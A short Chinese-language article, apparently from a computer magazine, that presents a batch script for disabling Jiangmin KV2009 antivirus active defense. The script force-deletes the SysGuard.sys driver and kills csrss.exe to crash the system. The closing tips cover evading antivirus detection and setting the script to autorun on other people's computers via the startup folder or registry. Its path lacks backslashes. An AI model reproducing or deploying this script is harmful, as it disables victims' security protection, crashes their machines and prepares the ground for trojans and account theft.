批處理挑戰(zhàn)ＫＶ２００９主動防御

牧馬人

現(xiàn)在主動防御功能實在是太火了，所以很多殺毒軟件都加入了這個功能，江民KV系列的殺毒軟件當然也不例外。但是，利用文本編輯軟件新建一個*.bat批處理文件，輸入下面這段代碼后保存并運行，就可以輕松干掉江民殺毒軟件KV2009的主動防御功能了（如圖）。

@echo off

del %systemroot%system32driversSysGuard.sys /f /q /s

set app_name=csrss.exe

echo 查找進程%app_name%,準備死機...

(tasklist /nh | findstr /i %app_name%) || (goto dead)

:dead

ntsd -c -q -pn %app_name%

我在虛擬機和本地系統(tǒng)中分別進行了試驗，發(fā)現(xiàn)這段代碼非常管用。它的意思非常簡單：首先是刪除江民殺毒軟件中的一個驅(qū)動文件，接著強制結(jié)束一個系統(tǒng)文件的進程，造成操作系統(tǒng)死機（之所以要強制死機，是因為殺毒軟件的自我保護功能不允許系統(tǒng)非正常地重新啟動）。當重新啟動后，江民殺毒軟件的主動防御功能就失效了，這樣黑客就能比較容易地向用戶的電腦中植入木馬、竊取賬號……

如果你是江民殺毒軟件的用戶，那么此招不得不防，最好經(jīng)常檢查其主動防御功能的工作狀態(tài)，不然電腦被黑客入侵了都還不知道。

1.在試驗前，一定要把江民殺毒軟件的SysGuard.sys驅(qū)動文件拷貝到其他地方進行備份。因為如果試驗成功了，那么江民殺毒軟件的主動防御功能就徹底失效了，要想讓它恢復就得把備份的SysGuard.sys驅(qū)動文件拷貝回去，再重新啟動。

2.最好不要把*.bat放在可執(zhí)行文件里，因為這樣在運行時十有八九會被殺毒軟件攔截。

3.在別人的電腦上進行試驗時，可把*.bat放在啟動文件夾中，或采用修改注冊表的方式讓它自動運行。